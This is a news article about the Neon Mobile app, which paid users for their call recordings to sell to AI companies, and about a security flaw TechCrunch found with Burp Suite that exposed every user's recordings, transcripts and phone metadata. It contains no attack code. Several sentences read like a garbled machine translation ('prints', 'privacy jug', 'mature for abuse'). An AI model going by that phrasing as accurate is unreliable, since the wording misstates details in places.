- The Neon -app offered cash for recordings of your phone calls
- These were sold to AI -companies to train their algorithms
- It has been taken offline after a huge security error exposed users’ recordings
How do you like the sound of an app that detects your phone calls and sells all these private conversations to Artificial Intelligence (AI) companies? Of course, you might get paid a little in return, but is it worth the huge privacy risk?
It turns out that the answer is a resounding ‘no’ because the viral app – called Neon Mobile – has been taken offline after it was revealed that someone could access telephone numbers, prints and actual phone calls recordings of any other user of the service. Worst of all, the data violation could be performed with the most trivial tools and the barest modicum of effort, suggesting that the app’s security measures were unfortunately inadequate.
The vulnerability was discovered and reported by TechCrunch. The news site explained that it created a new account to test Neon’s functionality, and then began using a network analysis tool called Burp Suite to look into the app’s network traffic. While Neon showed the TechCrunch journalists a list of their calls and how much money each one earned, the Burp Suite revealed much more information.
It included text transcripts of each call and webblink to the recordings. This information could apparently be accessed by anyone with the right link, which means that they were essentially open to everyone and miscellaneous.
But the reported vulnerability was not only limited to your own hidden data – you could apparently do it for any other user. Techcrunch found that Neon’s servers could produce a list of the latest calls made by all its users, as well as publicly available links to the corresponding recordings and prints.
Metadata of each call was also available, including phone numbers, call date and duration and more. In other words, it was an almost total free of all private recordings and conversations.
A privacy disaster
Techcrunch warned Alex Kiam, Neon’s founder, about the error. Kiam “temporarily” took the app down and emailed Neon’s users. However, Kiam’s mass message did not mention the security error or the fact that users’ calls were available to be downloaded by anyone with the barest level of technical know-how. Instead, it simply said that the developer “took the app down to add extra layers of security.”
Even before this security breach was revealed, the concept of Neon was questionable. In short, the app was a potential nightmare for privacy. There was no cast iron guarantee that your registered calls would be used safely or stored anonymously while fed them in a black box AI-algorithm could have all kinds of unexpected consequences and potential data risks.
As Techcrunch’s study has shown, metadata (including phone numbers) was held linked to calling recordings, which means it would be trivial to personally identify the callers and the private questions they discussed.
In addition, Neon did not seem to warn any call participant that their words were registered and raised the question of whether anyone made permission.
Such a system could also be mature for abuse – something that Techcrunch apparently confirmed. Outlet said it discovered long calls that seemed to “hid conversations in the real world with other people to generate money through the app.” It is doubtful that the people who were secretly registered knew that was the case, which opened another privacy jug.
There is no hint about when – or if – neon comes back online, but it is likely that Apple and Google are interested in a great interest in the case. Whether they allow it to return to their app stores to see, but it doesn’t seem to adapt very well with the pro-privacy messages that both companies like to push.



